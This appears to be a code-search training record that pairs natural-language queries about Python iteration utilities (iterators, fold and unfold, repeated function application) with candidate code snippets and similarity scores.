cycle(f1, f2, f3):\n def how_many(n):\n def what(x):\n if n >= 1:\n x = f1(x)\n if n >= 2:\n x = f2(x)\n if n >= 3:\n x = f3(x)\n if n > 3:\n return how_many(n - 3)(x)\n else:\n return x\n return what\n return how_many", "def run_epochs(self,\n fn: Callable[..., Optional[Dict[str, Any]]],\n data_generator: Iterable[ArrayTupleOrList],\n limit: Optional[int] = None,\n count: Optional[int] = None,\n metrics: Union[Sequence[str], type(ALL)] = NOT_SET,\n excludes: Sequence[str] = ()\n ) -> None:\n g = self.iter_epochs(limit=limit, count=count)\n try:\n for _ in g:\n self.run_batches(\n fn, data_generator, metrics=metrics, excludes=excludes)\n finally:\n g.close()", "def _trampoline_private(func):\n while callable(func):\n func = func()\n return func", "def call_orig_func(func, *args, **kwargs):\n return func(*args, **kwargs)", "def try_hard(fun, *args, **kwargs):\n # type: (Callable, *Any, **Any) -> Any\n warnings.simplefilter('always', UserWarning)\n try_hard_limit = -1\n if kwargs is not None:\n if 'try_hard_limit' in kwargs.keys():\n try_hard_limit = kwargs['try_hard_limit']\n del kwargs['try_hard_limit']\n\n msg = None\n return_value = None\n successful = False\n attempts = 0\n while not successful:\n try:\n return_value = fun(*args, **kwargs)\n successful = True\n except Exception as e:\n attempts += 1\n\n if msg is None:\n msg = 'Had to try again to evaluate: %s(' % fun.__name__ + ', '.join(['%s' % arg for arg in args])\n if kwargs is not None:\n msg += ', '.join(['%s=%s' % (key, value) for key, value in kwargs.items()])\n msg += '). The following exception was raised: \"%s\"' % e.message\n\n if 0 < try_hard_limit <= attempts:\n raise\n else:\n warnings.warn(msg)\n\n return return_value", "def fibonacci(a=1, b=2):\n while True:\n yield a\n a, b = b, b+a" ]
[ "0.7004105", "0.6646999", "0.63588154", "0.633149", "0.6150608", "0.6094851", "0.6073668", "0.59957045", "0.5961045", "0.5894083", "0.5876988", "0.58702266", "0.5862073", "0.58489794", "0.5841767", "0.5814898", "0.57949513", "0.5713033", "0.5708868", "0.57078665", "0.5697791", "0.56956506", "0.5677816", "0.56695217", "0.56593865", "0.56593865", "0.56593865", "0.5604495", "0.55875486", "0.5585913", "0.5576986", "0.5543687", "0.5537169", "0.5537169", "0.5521437", "0.5520357", "0.5511987", "0.5487532", "0.54873186", "0.54551095", "0.5446456", "0.54407173", "0.5433639", "0.54220814", "0.54182994", "0.53821105", "0.5370407", "0.5365031", "0.53563625", "0.5345463", "0.53384566", "0.53175104", "0.5315607", "0.5306357", "0.5298923", "0.52837324", "0.52820754", "0.52790767", "0.5275322", "0.52749217", "0.5274559", "0.5263902", "0.52609855", "0.5252699", "0.5251552", "0.52370155", "0.5227625", "0.5225772", "0.52187204", "0.5213146", "0.5206683", "0.5206262", "0.5191474", "0.5189263", "0.51790124", "0.5177619", "0.51680845", "0.5163011", "0.51583606", "0.5149915", "0.51494586", "0.51492673", "0.5147553", "0.5147553", "0.5147553", "0.5147553", "0.5147553", "0.5147553", "0.5147553", "0.51424974", "0.5141331", "0.511099", "0.5105813", "0.5102432", "0.5095912", "0.50956124", "0.50939536", "0.5087599", "0.5083791", "0.5071413" ]
0.7911098
0
Return iterator with a single object.
def singleton(obj: T, expand: bool = False) -> Iter[T]: if expand: try: yield from obj except TypeError: pass yield obj
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getIter(object):\n iterator = None\n try:\n iterator = iter(object)\n except TypeError:\n pass\n return iterator", "def __next__(self):\n return next(self.iterator)", "def __iter__(self):\n self._first()\n return self", "def __iter__(self):\n return self.next()", "def __next__(self):\n return next(self.iter)", "def __iter__(self):\n return self._next()", "def __iter__(self):\n return self._next()", "def __iter__(self):\n return self._next()", "def one(self):\n self.limit(2)\n u = self.get_cursor()\n u = list(u)\n assert u, \"expected one object\"\n if len(u) > 1:\n assert u, \"expected one object, more than one received\"\n return self.from_(**self.prepare_data(u[0]))", "def next(self):\n if not self._peek_seen:\n self._peek_seen = True\n return self._peek\n try:\n # Object is a generator or iterator.\n return self._iterable.next()\n except AttributeError:\n pass\n try:\n # Object is a list.\n return self._iterable.pop(0)\n except AttributeError:\n pass\n except (AttributeError, IndexError, KeyError, TypeError):\n raise StopIteration\n # Object is not iterable -- treat it as the only item.\n raise StopIteration", "def __next__(self):\n if self._cursor is None:\n raise StopIteration(\"Iterator has not been initialized. Use `iter` first.\")\n\n return self._cursor.next()", "def anyObject(iterable):\n for obj in iterable:\n return obj", "def __iter__(self):\n return self.new_generator()", "def __iter__(self) -> object:\n return self", "def next_object(self):\n if not self._buffer_size():\n return None\n return next(self.delegate)", "def _NextItem(self):\n if self._injected:\n self._injected = False\n return self._injected_value\n try:\n # Object is a generator or iterator.\n return self._iterable.next()\n except AttributeError:\n pass\n except StopIteration:\n self._tap.Done()\n raise\n try:\n # Object is a list.\n return self._iterable.pop(0)\n except (AttributeError, KeyError, TypeError):\n pass\n except IndexError:\n self._tap.Done()\n raise StopIteration\n # Object is not iterable -- treat it as the only item.\n if self._iterable is None or self._stop:\n self._tap.Done()\n raise StopIteration\n self._stop = True\n return self._iterable", "def __iter__(self) -> Iterator[T]:\n return self", "def get_next(self):\n raise NotImplementedError(\"Iterator.get_next()\")", "def next(self):\n try:\n ret = PymongoCursor.next(self)\n except StopIteration:\n self.__fullcache = True\n raise\n self.__itercache.append(ret)\n return ret", "def __next__(self):\n return self.next()", "def __next__(self):\n return self.next()", "def __next__(self):\n return self.next()", "def __iter__(self):\n return self.ListIterator(self.first)", "def Iterator():\n return _table.Iterator()", "def one(self):\n return next(iter(self), None)", "def __iter__(self):\n return iter(range(1, self.size() + 1))", "def __iter__(self):\n # type: () -> Iterator[Any]\n return iter(self[index] for index in range(len(self)))", "def fetchone(self):\n try:\n return next(self._results)\n except StopIteration:\n return None", "def __iter__(self):\n for o in self._iter:\n yield o", "def get_single_result(self):\n for r in self:\n return r", "def __iter__(self):\r\n return self._iterate()", "def __call__(self):\r\n return self.next()", "def next(self) -> List[object]:\n ...", "def __iter__(self):\n cursor = self._front\n while not cursor is None:\n yield cursor.data\n cursor = cursor.next", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return iter(self.__iter())", "def __next__(self) :\n\n data = self.cur.fetchone()\n if not data :\n raise StopIteration\n return RowReference(self.desc, data[1:])", "def __next__(self):\n\t\treturn next()", "def __iter__(self):\n cursor = 0\n while cursor < len(self):\n yield self._items[cursor]\n cursor += 1", "def iter(self):\n s = self.first\n while True:\n yield s\n s = s.__next__\n if s == self.first:\n return", "def oneIteration(self):\n\t\traise NotImplementedError", "def __next__(self):\n try:\n t = self.items[self.pos]\n except IndexError:\n raise EOF()\n self.pos += 1\n return t", "def __iter__(self):\r\n return self", "def __iter__(self):\n return self._cursor", "def __iter__(self):\n # Ripped off from elasticutils\n return (self.objects[id] for id in self.ids if id in self.objects)", "def next(self) -> object:\n return self._next", "def __next__(self):\n if(self._isDone()):\n raise StopIteration\n return self._next()", "def __iter__(self):\n\n return self", "def first(self):\n try:\n return self.next()\n except StopIteration:\n return None", "def get_iterator(self, name):\n return self._iterators[name]", "def next(self):\n return type(self).__next__(self)", "def __next__(self):\n \n if self.i == len(self.data):\n raise StopIteration\n item = self.data[self.i]\n self.i += 1\n return item", "def iterator(self):\n yield", "def next(self):\n return self.__next__()", "def next(self):\n return self.__next__()", "def next(self):\n return self.__next__()", "def next(self):\n return self.__next__()", "def next(self):\n return self.__next__()", "def next(self):\n return self.__next__()", "def next(self):\n return self.__next__()", "def _Peek(self):\n try:\n # Object is a generator or iterator.\n return self._iterable.next()\n except AttributeError:\n pass\n except StopIteration:\n self._peek_seen = True\n return None\n try:\n # Object is a list.\n return self._iterable.pop(0)\n except (AttributeError, IndexError, KeyError, TypeError):\n pass\n # Object is not iterable -- treat it as the only item.\n return self._iterable", "def get_iterator(dataset):\n if context.executing_eagerly():\n iterator = dataset_ops.make_one_shot_iterator(dataset)\n else:\n iterator = dataset_ops.make_initializable_iterator(dataset)\n initialize_iterator(iterator)\n return iterator", "def __iter__(self):\n items = self._fetch()\n for item in items:\n yield item", "def __iter__(self):\n cursor=0\n while cursor<len(self):\n yield self._item[cursor].key\n cursor+=1", "def makeiter(obj):\n if not obj:\n return []\n if not isiterable(obj):\n return [obj]\n return obj", "def __iter__(self):\n for item in self._reader:\n yield item", "def __next__(self):\n if self._idx < len(self._rib):\n key_result = self._rib.get_key(self._idx)\n result = self._rib[key_result]\n self._idx += 1\n return result\n\n raise StopIteration", "def __iter__(self) -> object:\n return LinkedListIterator(self)", "def __iter__(self):\n return (self.get_node(node_id) for node_id in self._collection.all_keys())", "def __iter__(self):\n return iter(())", "def __next__(self):\n\t\tif self.i >= len(self.l):\n\t\t\tself.i = 0\n\t\t\traise StopIteration\n\t\tresult = self.l[self.i]\n\t\tself.i += 1\n\t\treturn result", "def __iter__(self):\n return iter(self._items)\n # to use a generator, it would look like this...\n # for item in self._items: yield item", "def next(self):\n return _libsbml.SwigPyIterator_next(self)", "def one(self):\n try:\n result = self.next()\n except StopIteration:\n raise ValueError('Less than one result from .one()')\n try:\n self.next()\n except StopIteration:\n return result\n raise ValueError('More than one result from .one()')", "def __iter__(self):\n cursor = self.first()\n while cursor is not None:\n yield cursor.element()\n cursor = self.after(cursor)", "def next(self):\n return next(self.gen)", "def one(self):\n return self._iter().one()", "def __iter__(self) -> Iterator[Batch]:\n return self.get_iterator()", "def next(self):\n nxt = self.readentry()\n if nxt is None:\n raise StopIteration\n return nxt" ]
[ "0.75817907", "0.74081564", "0.7373555", "0.71963745", "0.71724164", "0.7078414", "0.7078414", "0.7078414", "0.6872086", "0.6868703", "0.683738", "0.67541516", "0.665635", "0.66446465", "0.6599324", "0.65719706", "0.65708953", "0.65270007", "0.6459694", "0.64549285", "0.64549285", "0.64549285", "0.64374125", "0.64172226", "0.6414021", "0.6390782", "0.6379818", "0.63587266", "0.6349127", "0.63318557", "0.63298196", "0.6329625", "0.6323944", "0.631983", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6279644", "0.62768555", "0.6275545", "0.62750477", "0.6271484", "0.623421", "0.62187064", "0.6215623", "0.62154925", "0.620671", "0.620216", "0.6186279", "0.61740214", "0.6149473", "0.6149072", "0.61431664", "0.613794", "0.6132762", "0.6124234", "0.6124234", "0.6124234", "0.6124234", "0.6124234", "0.6124234", "0.6124234", "0.6119415", "0.6103079", "0.6090697", "0.60901415", "0.6085427", "0.6080149", "0.60789734", "0.60753465", "0.6065723", "0.60605675", "0.60582924", "0.60565424", "0.6049802", "0.60483974", "0.6041174", "0.6019598", "0.6010882", "0.6006847", "0.6005798" ]
0.6621986
14
Invert a fold. Similar to iterate, but expects a function of seed > (seed', x). The second value of the tuple is included in the resulting sequence while the first is used to seed func in the next iteration. Stops iteration if func returns None or raise StopIteration.
def unfold(func, seed): try: elem = func(seed) while elem is not None: seed, x = elem yield x elem = func(seed) except StopIteration as e: yield from stop_seq(e)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def inverse(f):\n return lambda y: search(lambda x: f(x) == y)", "def fold(iterable, func, base):\n acc = base\n for element in iterable:\n acc = func(acc, element)\n return acc", "def foldl(func, start, itr):\n return _foldl(func, start, iter(itr))", "def flip(func):\n if not callable(func):\n raise TypeError(\"First argument to flip must be callable\")\n \n def flipped_func(*args, **kwargs):\n return func(*reversed(args), **kwargs)\n return flipped_func", "def flip(f):\n return lambda *args, **kwargs: f(*args[::-1], **kwargs)", "def inverse(func: Callable):\n @wraps(func)\n def _wrapper(*args, **kwargs):\n return 1.0 / func(*args, **kwargs)\n return _wrapper", "def invert_function(self, qubits):\n\n for qubit in qubits:\n X | qubit", "def foldr(func, start, itr):\n return _foldr(func, start, iter(itr))", "def flip(f: Callable[[A, B], Any]) -> Callable[[B, A], Any]:\n return lambda x, y: f(y, x)", "def flip(f: Callable) -> Callable:\n return curry(lambda *args, **kwargs: f(*reversed(args), **kwargs))", "def foldl2(link, fn, z):\n def step(x, g):\n \"*** YOUR CODE HERE ***\"\n return foldr(link, step, identity)(z)", "def negate_all(f):\r\n return lambda *args, **kwargs: [-y for y in f(*args,**kwargs)]", "def negate_all(f):\n return lambda *args, **kwargs: [-y for y in f(*args, **kwargs)]", "def negate_all(f):\n return lambda *args, **kwargs: [-y for y in f(*args, **kwargs)]", "def _fold_loop(cls, f, agg, next):\n\n while next is not None:\n (val, next) = next\n agg = f(val, agg)\n return agg", "def interleave(inter, f, seq):\n seq = iter(seq)\n try:\n f(next(seq))\n except StopIteration:\n pass\n else:\n for x in seq:\n inter()\n f(x)", "def iterate(func, x):\n while True:\n x = func(x)\n yield x", "def filtern(func: Callable, iterable: Iterable):\n return next(filter(func, iterable))", "def cofold(function, initial, iterator):\n acc = [initial]\n\n def handleAcc(newAcc):\n acc[0] = newAcc\n\n def dofold(item):\n return function(acc[0], item)\n\n d = _CoFunCaller(dofold, resultCollector=handleAcc).coiterate(iterator)\n d.addCallback(lambda _: acc[0])\n return d", "def ifilter_c(func):\n return functools.partial(ifilter, func)", "def _walk_inverse(self, step_fn, y, **kwargs):\n for bij in self._bijectors:\n y = step_fn(bij, y, **kwargs.get(bij.name, {}))\n return y # Now `x`", "def inverse(self, x, *args, **kwargs):\n if self.list_of_inverses is None:\n utils.print_warning(\"inverses were not given\")\n return\n for i in range(len(self.list_of_inverses)):\n x = self.list_of_inverses[i](x, *args, **kwargs)\n return x", "def imap_c(func):\n return functools.partial(imap, func)", "def repeatedly(func, /, *args, **kwargs):\n func = to_callable(func)\n try:\n while True:\n yield func(*args, **kwargs)\n except StopIteration as e:\n yield from stop_seq(e)", "def inverted( self ):\n return self._modifier(\n self,\n lambda x: invert_bits( x, self.nr_of_pins )\n )", "def __iter__(self):\n makeit = getattr(self._data, '__inverted__', self.__next__)\n return makeit()", "def ireduce(f, it):\n acc = it.next()\n yield acc\n for x in it:\n acc = f(acc, x)\n yield acc", "def flipflop(it, state=True):\n for i in it:\n yield (state, i)\n state = not state", "def selfie_depreceated(f):\n return partial(f, f)", "def negate(f):\n return lambda *args, **kwargs: -f(*args, **kwargs)", "def negate(f):\n return lambda *args, **kwargs: -f(*args, **kwargs)", "def foldr(link, fn, z):\n \"*** YOUR CODE HERE ***\"", "def mlift(func):\n return compose(unit, func)", "def negate(f):\r\n return lambda *args, **kwargs: -f(*args, **kwargs)", "def inv_inplace(a):", "def ifilter(self, func: Callable[[T], bool]) -> '_[T]':\n return _(filter(func, self.array))", "def inverse(f, a, b, num_iters=64):\n if a >= b:\n raise ValueError(f\"Invalid interval ({a}, {b})\")\n\n def g(y):\n if y > f(b) or y < f(a):\n raise ValueError(f\"Invalid image ({y})\")\n lower = a\n upper = b\n for _ in range(num_iters):\n mid = average(lower, upper)\n if f(mid) < y:\n lower = mid\n elif f(mid) > y:\n upper = mid\n else:\n return mid\n return mid\n\n return g", "def inverse(self):\n cdef StdVectorFst result = self.copy()\n result.invert()\n return result", "def reduce_right(self, func, init=None):\n return self.reverse().reduce(func, init)", "def iterate(func: Callable[..., T], x: T, *args, index: Index = None):\n func = to_callable(func)\n index = to_index_seq(index)\n\n if index is None and not args:\n out = _iterate(func, x)\n elif index is None:\n out = _iterate_n(func, (x, *args))\n else:\n if not args:\n out = _iterate_indexed(func, index, x)\n else:\n out = _iterate_indexed_n(func, index, (x, *args))\n\n return Iter(out)", "def drop_while(coll, func): \n i = 0\n while i < len(coll) and func(coll[i]):\n i += 1\n return coll[i:]", "def twice(func, value):\n return func(func(value))", "def inverse(self, x):\n return self.mul(self.weights, x.unsqueeze(-1)).squeeze(-1) + self.shift\n #return self.mul(torch.inverse(self.weights), (x - self.shift).unsqueeze(-1)).squeeze(-1)", "def erfcinv(a):", "def negate(func: Callable):\n @wraps(func)\n def _wrapper(*args, **kwargs):\n return -func(*args, **kwargs)\n return _wrapper", "def wrapper_fn(*args, **kwargs):\n\n if __enveloop_number_of_loops__[fn.__name__] > 0:\n __enveloop_number_of_loops__[fn.__name__] -= 1\n return fn(*args, **kwargs)\n else:\n del __enveloop_number_of_loops__[fn.__name__]\n if callback:\n return callback(*args, **kwargs)", "def non_step(func):\n assert not hasattr(func, \"_skip_inference\"), \\\n \"Double-wrapped method %r?\" % func\n func._skip_inference = True # pylint: disable=protected-access\n return func", "def lift(func: Callable) -> Callable:\n return lambda f: compose2(func, f)", "def NOT(r):\n return lambda l, i: not r(l, i)", "def iterate(f, x):\n while True:\n yield x\n x = f(x)", "def make_func_repeater(f, x):\n\n def repeat(i, x=x):\n if i == 0:\n return x\n else:\n return repeat(i-1, f(x))\n return repeat", "def filter(self, fn: Callable[[Tuple[K, List[V]]], bool]) -> Iterator[Tuple[K, List[V]]]:\n raise NotImplementedError", "def _inner_preduce(x):\n if len(x) <= 2:\n return _sfn(x)\n paired_x = partition_all(2, x)\n new_x = tuple(pool.map(_sfn, paired_x))\n return _inner_preduce(new_x)", "def test_func_generator_transplant():\n def test_odd(v):\n assert v % 2\n for i in range(0, 4):\n yield test_odd, i", "def test_unwrap_or_else(\n self, start: Result[int, int], fn: t.Callable[[int], int], exp: int\n ) -> None:\n assert start.unwrap_or_else(fn) == exp", "def tensorinv(a, ind=2):\n return TensorInv(ind)(a)", "def lift(f: Callable[..., Data]) -> LiftedFunc:\n def inner(*args: Result) -> Result:\n out = []\n for args1 in itertools.product(*args):\n val = f(*args1)\n out.append(val)\n return out\n return inner", "def filter(iteratee, seq):\n return _filter(fnc.iteratee(iteratee), seq)", "def inverted(values, input_min=0, input_max=1):\n values = _normalize(values)\n if input_min >= input_max:\n raise ValueError('input_min must be smaller than input_max')\n for v in values:\n yield input_min + input_max - v", "def mixrows(self, func=lambda a: random().scramble(a)):\n self.a = func(self.a)", "def chained(func):\n def wrapper(*args, **kwargs):\n for xs in func(*args, **kwargs):\n for x in xs:\n yield x\n return wrapper", "def inverse(self, x):\n x = np.asarray(x)\n def r(vec):\n return utils.recycled(vec, as_=x)\n if self.zero is not None and self.multiplier is not None:\n x = x / r(self.multiplier) + r(self.zero)\n elif self.zero is not None:\n x = x + r(self.zero)\n elif self.multiplier is not None:\n x = x / r(self.multiplier)\n return x", "def reduce(self, func, init=None):\n return _(reduce(func, self._, init) if init else reduce(func, self._))", "def apply(cls, func):\n raise NotImplementedError", "def each(self, func):\n\n for i in self._:\n func(i)\n return self", "def remove_if(rng, pred):\n j = 0\n for i, x in enumerate(rng):\n if pred(x):\n continue\n if i != j:\n rng[i], rng[j] = rng[j], rng[i]\n j += 1\n return j", "def filter(iterable, filter_func):\n for item in iterable:\n item = filter_func(item)\n if item is not None:\n yield item", "def foreach(function):\n return partial(map, function)", "def random_seeded(func):\n\n @wraps(func)\n def wrapper(*args, random_seed: int = None, **kwargs):\n _RNG.seed(random_seed)\n return func(*args, **kwargs)\n\n return wrapper", "def inverse(self: T) -> T:", "def zero_state(self, x):\n base_state = super(FoldingInnerOptimizer, self).zero_state(x)\n fold_state = self._init_fold_state_fn(x)\n if not isinstance(fold_state, tf.Tensor):\n raise NotImplementedError('Only tensor `fold_state`s supported')\n return base_state + (fold_state,)", "def generator(func):\n\n @fn\n @wraps(func)\n def gen(*args, **kwargs):\n return Iter(func(*args, **kwargs))\n\n return gen", "def dewindowify(iterable):\n for _, current, _ in iterable:\n yield current", "def cfilter(func,iterable):\n result = []\n\n for i in iterable:\n\n if func(i) == True:\n result.append(i)\n\n return result", "def apply_to_odd_positions(f, xs):\n ys = []\n for i, x in enumerate(xs):\n if i % 2 == 1:\n ys.append(f(x))\n else:\n ys.append(x)\n return ys", "def flip(self, x, y, /, *args, **kwargs):\n return self._func(y, x, *args, **kwargs)", "def invert_inplace(a):", "def compose(*funcs):\n if not funcs:\n return identity\n\n def wrapper(*args, **kwargs):\n fst, *rest = funcs\n ret = fst(*args, **kwargs)\n\n for f in rest:\n ret = f(ret)\n\n return ret\n\n return wrapper", "def imap(self, func: Callable[[T], V]) -> '_[V]':\n return _(map(func, self.array))", "def retrying(func, *retry_args, **retry_kwargs):\n yield retriable(*retry_args, **retry_kwargs)(func)", "def test_func_generator():\n def test_odd(v):\n assert v % 2\n for i in range(0, 4):\n yield test_odd, i", "def call_orig_func(func, *args, **kwargs):\n return func(*args, **kwargs)", "def transform(self, func):\n if func.__code__.co_argcount == 1:\n oldfunc = func\n func = lambda t, rdd: oldfunc(rdd)\n assert func.__code__.co_argcount == 2, \"func should take one or two arguments\"\n\n return KafkaTransformedDStream(self, func)", "def _inv(self) -> None:\n\n self.inv(inplace=True)", "def intercept(iterable, function):\n\n def intercepting(iterable_):\n for item in iterable_:\n function(item)\n yield item\n\n return intercepting(iterable)", "def lift(cls, func):\n raise NotImplementedError", "def mcompose(*mfuncs):\n return functools.partial(foldl, bind, tuple(reversed(mfuncs)))", "def iter_except(cls, func, exception, first=None):\n try:\n if first is not None:\n yield first() # For database APIs needing an initial cast to db.first()\n while True:\n yield func()\n except exception:\n pass", "def reduce_my(self, func: Callable[[int, int], int], key: keyType, initial_state: int) -> int:\n iterable = self.get_by_key(key)\n tmp = [] # type: List\n if not isinstance(iterable, list):\n tmp = list([iterable])\n else:\n tmp = iterable\n it = iter(tmp)\n value = initial_state\n for element in it:\n # Support the element with one-dimension list\n if isinstance(element, list):\n for e in element:\n value = func(value, e)\n else:\n value = func(value, element)\n return value", "def check_identity_lazy(func, accumulator):\r\n # Call each function with several arguments, and check that it is\r\n # evaluated only once per argument.\r\n memory = Memory(cachedir=env['dir'], verbose=0)\r\n memory.clear(warn=False)\r\n func = memory.cache(func)\r\n for i in range(3):\r\n for _ in range(2):\r\n yield nose.tools.assert_equal, func(i), i\r\n yield nose.tools.assert_equal, len(accumulator), i + 1", "def eager_map(func, iterable):\n for _ in map(func, iterable):\n continue", "def foreach(func, iterable):\n\n\tfor x in iterable:\n\t\tfunc(x)", "def down_to(self, n, fn):\n for i in range(self._, n, -1):\n fn(i)\n return self", "def filter(self, fn: Callable[[Tuple[K, List[V]]], bool]) -> Iterator[Tuple[K, List[V]]]:\n return (entry for entry in iter(self) if fn(entry))", "def foldl(link, fn, z):\n if link is Link.empty:\n return z\n \"*** YOUR CODE HERE ***\"\n return foldl(______, ______, ______)", "def take_while(coll, func):\n i = 0\n while i < len(coll) and func(coll[i]):\n i += 1\n return coll[:i]", "def not_random(func):\n func.random = False\n return func", "def keep_indexed(f):\n def _keep_indexed_xducer(step):\n outer = {\"idx\": 0}\n def _keep_indexed_step(r=Missing, x=Missing):\n if r is Missing: return step()\n if x is Missing:\n return step(r)\n res = f(outer[\"idx\"], x)\n outer[\"idx\"] += 1\n return step(r, res) if res is not None else r\n return _keep_indexed_step\n return _keep_indexed_xducer", "def iter(space, w_collection_or_callable, w_sentinel=None):\n if w_sentinel is None:\n return space.iter(w_collection_or_callable)\n else:\n return iter_sentinel(space, w_collection_or_callable, w_sentinel)", "def compose(*funcs):\n return reduce(lambda f, g: lambda x: f(g(x)), funcs[::-1])" ]
[ "0.551734", "0.54347765", "0.5407587", "0.53981245", "0.5355724", "0.5321342", "0.5257516", "0.52478385", "0.50181824", "0.5012077", "0.49952018", "0.49402606", "0.493333", "0.493333", "0.4932859", "0.492038", "0.49162006", "0.4866282", "0.4826197", "0.480424", "0.48014733", "0.4791138", "0.47671264", "0.47487557", "0.47135735", "0.46805188", "0.46710217", "0.46284175", "0.46256432", "0.4621728", "0.4619807", "0.4619312", "0.460202", "0.4590993", "0.45563048", "0.45561835", "0.45517552", "0.45474654", "0.45422897", "0.45036384", "0.449852", "0.44630995", "0.44437355", "0.4441935", "0.44233933", "0.4410368", "0.44002774", "0.43972102", "0.43897507", "0.43889523", "0.43795368", "0.43752265", "0.4361252", "0.43604678", "0.43532786", "0.43437228", "0.4341991", "0.4339064", "0.43379503", "0.4330586", "0.43217027", "0.4314954", "0.43109486", "0.43011883", "0.43001214", "0.42874897", "0.42835727", "0.42834854", "0.42780495", "0.4274552", "0.42698976", "0.42678916", "0.42671865", "0.42627653", "0.4261924", "0.4260646", "0.42606208", "0.42505127", "0.42480436", "0.42457104", "0.42379892", "0.42319062", "0.42210644", "0.42205396", "0.42189127", "0.4214401", "0.41930202", "0.41852054", "0.41842112", "0.41827744", "0.4180274", "0.41703707", "0.41619122", "0.41597277", "0.4155464", "0.41472828", "0.41429338", "0.4138269", "0.4137449", "0.4134657" ]
0.76988935
0
f""" Repeatedly apply a function func to input. If more than one argument to func is passed, it iterate over the past n values. It requires at least one argument, if you need to iterate a zero
def iterate(func: Callable[..., T], x: T, *args, index: Index = None): func = to_callable(func) index = to_index_seq(index) if index is None and not args: out = _iterate(func, x) elif index is None: out = _iterate_n(func, (x, *args)) else: if not args: out = _iterate_indexed(func, index, x) else: out = _iterate_indexed_n(func, index, (x, *args)) return Iter(out)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _call_n(x, f, n, *args, **kwargs):\n return [f(i, x, *args, **kwargs) for i in range(n)]", "def loop(func, n):\n for i in range(n):\n func()", "def repeatfunc(func, n, *args):\n return starmap(func, repeat(args, n))", "def repeat(fun, n):\n for i in range(n):\n yield fun()", "def repeated(f, n, x):\n if n == 1:\n return f(x)\n else:\n return repeated(f,n-1,f(x))", "def make_func_repeater(f, x):\n\n def repeat(i, x=x):\n if i == 0:\n return x\n else:\n return repeat(i-1, f(x))\n return repeat", "def iterate(func, x):\n while True:\n x = func(x)\n yield x", "def repeatedly(func, /, *args, **kwargs):\n func = to_callable(func)\n try:\n while True:\n yield func(*args, **kwargs)\n except StopIteration as e:\n yield from stop_seq(e)", "def main(n):\n return sum(f(i) for i in xrange(n))", "def repeat(self, fn, *args, **kwargs):\n return repeat_n_times(self.n, fn, *args, **kwargs)", "def repeat_n_times(n, fn, *args, **kwargs):\n if args:\n my_args = _transpose_list_of_lists(\n [_maybe_repeat(arg, n) for arg in args])\n else:\n my_args = [[] for _ in range(n)]\n my_kwargs = [{} for _ in range(n)]\n for k, v in six.iteritems(kwargs):\n vals = _maybe_repeat(v, n)\n for i in range(n):\n my_kwargs[i][k] = vals[i]\n\n # construct lists of functions\n fns = _maybe_repeat(fn, n)\n outputs = [fns[i](*my_args[i], **my_kwargs[i]) for i in range(n)]\n if isinstance(outputs[0], tuple):\n outputs = list(zip(*outputs))\n outputs = tuple([list(o) for o in outputs])\n return outputs", "def iterate(f, x):\n while True:\n yield x\n x = f(x)", "def cycle(f1, f2, f3):\n def how_many(n):\n def what(x):\n if n >= 1:\n x = f1(x)\n if n >= 2:\n x = f2(x)\n if n >= 3:\n x = f3(x)\n if n > 3:\n return how_many(n - 3)(x)\n else:\n return x\n return what\n return how_many", "def benchmarkNFunc(iter, ns):\n def decorator(func):\n for n in ns:\n benchmarkFuncs.append((func, (n,), iter))\n return func\n return decorator", "def repeatfunc(func, times=None, *args):\n if times is None:\n return starmap(func, repeat(args))\n return starmap(func, repeat(args, times))", "def repeatfunc(func, times=None, *args):\n if times is None:\n return starmap(func, repeat(args))\n return starmap(func, repeat(args, times))", "def repeatfunc(cls, func, times=None, *args):\n if times is None:\n return starmap(func, repeat(args))\n return starmap(func, repeat(args, times))", "def repeat_func(func, *args, **kwargs):\n if kwargs:\n return starmap(lambda args, kwargs: func(*args, **kwargs),\n repeat((args, kwargs))\n )\n else:\n return starmap(func, repeat(args))", "def repeated_applications(f, n):\n\th = (f for i in range(n))\n\treturn itertools.reduce(combine, h)", "def _fold_loop(cls, f, agg, next):\n\n while next is not None:\n (val, next) = next\n agg = f(val, agg)\n return agg", "def loop(func):\n def wrapper(*a, **b):\n while True:\n func(*a, **b)\n return wrapper", "def times(self, fn):\n for i in range(0, self._):\n fn()\n return self", "def filtern(func: Callable, iterable: Iterable):\n return next(filter(func, iterable))", "def compute_over_actions(f, *args):\n\n '''\n # show the middle results\n for a in zip(*args):\n print(\"a:\", a)\n r = f(*a)\n print(\"r:\", r)\n '''\n\n return sum(f(*a) for a in zip(*args))", "def apply_along_1_nb(a, apply_func_nb, *args):\n out = np.empty_like(a, dtype=np.float_)\n for i in range(a.shape[0]):\n out[i, :] = apply_func_nb(i, a[i, :], *args)\n return out", "def _apply_func(data, func, num_rows, base_row_index=0, increment=False):\n row = list(data[base_row_index])\n curr_index = base_row_index\n for _ in range(num_rows):\n data.append(func(row))\n if increment:\n curr_index += 1\n row = list(data[curr_index])\n return data", "def g_iter(n):\n \"*** YOUR CODE HERE ***\"\n vals = [1, 2, 3]\n if n <= 3:\n return vals[n-1]\n for i in range(n - 3):\n new_val = 3 * vals[0] + 2 * vals[1] + 1 * vals[2]\n vals = vals[1:] + [new_val]\n return vals[-1]", "def n_ary(n, f):\n if n < 0:\n raise ValueError(\"First argument to n_ary must be a non-negative integer\")\n\n args1, args2 = generate_args(inspect.getfullargspec(f), n)\n\n return eval(\"lambda \" + args1 + \": f(\" + args2 + \")\", {\"f\": f})", "def lift(f: Callable[..., Data]) -> LiftedFunc:\n def inner(*args: Result) -> 